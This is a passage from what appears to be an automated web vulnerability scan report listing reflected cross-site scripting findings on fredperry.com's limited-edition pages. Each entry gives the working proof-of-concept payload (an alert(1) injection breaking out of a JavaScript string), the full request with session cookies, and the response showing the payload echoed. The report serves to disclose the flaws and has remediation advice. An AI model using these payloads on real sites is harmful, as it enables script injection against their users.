1.132. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shorts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd734"-alert(1)-"5870bc30553 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/mencd734"-alert(1)-"5870bc30553/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cmprdodont2kar3gf3rj1dhch7; expires=Tue, 09-Nov-2010 17:13:11 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/mencd734"-alert(1)-"5870bc30553/shorts/");
//]]>
...[SNIP]...

1.133. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shorts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a978"-alert(1)-"606c1d68e0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/shorts1a978"-alert(1)-"606c1d68e0f/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=m979oncrcran81j6ldggdbvt02; expires=Tue, 09-Nov-2010 17:13:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/shorts1a978"-alert(1)-"606c1d68e0f/");
//]]>
...[SNIP]...

1.134. http://www.fredperry.com/limited-edition/men/shorts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shorts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a1ac"-alert(1)-"94d6c0bb51d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/shorts/?2a1ac"-alert(1)-"94d6c0bb51d=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=n84oeqtbtkaimngalbhdh4b7p2; expires=Tue, 09-Nov-2010 17:12:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/shorts/?2a1ac"-alert(1)-"94d6c0bb51d=1");
//]]>
...[SNIP]...

1.135. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/trousers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 822b3"-alert(1)-"b20e2f3dc25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition822b3"-alert(1)-"b20e2f3dc25/men/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=t043khjde91qdmtguotmk6cul5; expires=Tue, 09-Nov-2010 17:12:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition822b3"-alert(1)-"b20e2f3dc25/men/trousers/");
//]]>
...[SNIP]...

1.136. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/trousers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 341fe"-alert(1)-"31db44bf19f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men341fe"-alert(1)-"31db44bf19f/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ea8jb9ed3q44qqk7655vn8uep3; expires=Tue, 09-Nov-2010 17:12:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men341fe"-alert(1)-"31db44bf19f/trousers/");
//]]>
...[SNIP]...

1.137. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/trousers/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3995f"-alert(1)-"a3952493b7c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/trousers3995f"-alert(1)-"a3952493b7c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=p1bt0tf99spp6ed3hjnti3frl5; expires=Tue, 09-Nov-2010 17:13:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/trousers3995f"-alert(1)-"a3952493b7c/");
//]]>
...[SNIP]...

1.138. http://www.fredperry.com/limited-edition/men/trousers/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/trousers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b150e"-alert(1)-"33d8408daf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/trousers/?b150e"-alert(1)-"33d8408daf3=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:10:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=naj9ms4mjpgu0e5lfjm5nos3h3; expires=Tue, 09-Nov-2010 17:10:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/trousers/?b150e"-alert(1)-"33d8408daf3=1");
//]]>
...[SNIP]...

1.139. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/woven-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c21cc"-alert(1)-"0ce157bdad7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionc21cc"-alert(1)-"0ce157bdad7/men/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jkc6rurokln17h26i69cb11qs6; expires=Tue, 09-Nov-2010 17:14:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionc21cc"-alert(1)-"0ce157bdad7/men/woven-shirts/");
//]]>
...[SNIP]...

1.140. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/woven-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49a6f"-alert(1)-"250afec6fce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men49a6f"-alert(1)-"250afec6fce/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=facdjjolf3cmv5erkbtf895pi0; expires=Tue, 09-Nov-2010 17:14:58 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men49a6f"-alert(1)-"250afec6fce/woven-shirts/");
//]]>
...[SNIP]...

1.141. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/woven-shirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7c44"-alert(1)-"e4a400a0921 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/woven-shirtsa7c44"-alert(1)-"e4a400a0921/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=53vnpl842au915dr6l8pe40j37; expires=Tue, 09-Nov-2010 17:15:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/woven-shirtsa7c44"-alert(1)-"e4a400a0921/");
//]]>
...[SNIP]...

1.142. http://www.fredperry.com/limited-edition/men/woven-shirts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/woven-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52818"-alert(1)-"864ea334664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/woven-shirts/?52818"-alert(1)-"864ea334664=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1rvit536klng9drge2lou592o2; expires=Tue, 09-Nov-2010 17:12:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/woven-shirts/?52818"-alert(1)-"864ea334664=1");
//]]>
...[SNIP]...

1.143. http://www.fredperry.com/limited-edition/women/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5f13"-alert(1)-"e0e423b9710 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionc5f13"-alert(1)-"e0e423b9710/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=oc7q2ucdi300denj3g419cgq85; expires=Tue, 09-Nov-2010 17:12:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionc5f13"-alert(1)-"e0e423b9710/women/");
//]]>
...[SNIP]...

1.144. http://www.fredperry.com/limited-edition/women/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e892d"-alert(1)-"71a594f2ca6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womene892d"-alert(1)-"71a594f2ca6/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=0j2alplcamddjnc4l2grtunqm1; expires=Tue, 09-Nov-2010 17:13:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womene892d"-alert(1)-"71a594f2ca6/");
//]]>
...[SNIP]...

1.145. http://www.fredperry.com/limited-edition/women/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58d36"-alert(1)-"7c51ba12963 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/?58d36"-alert(1)-"7c51ba12963=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
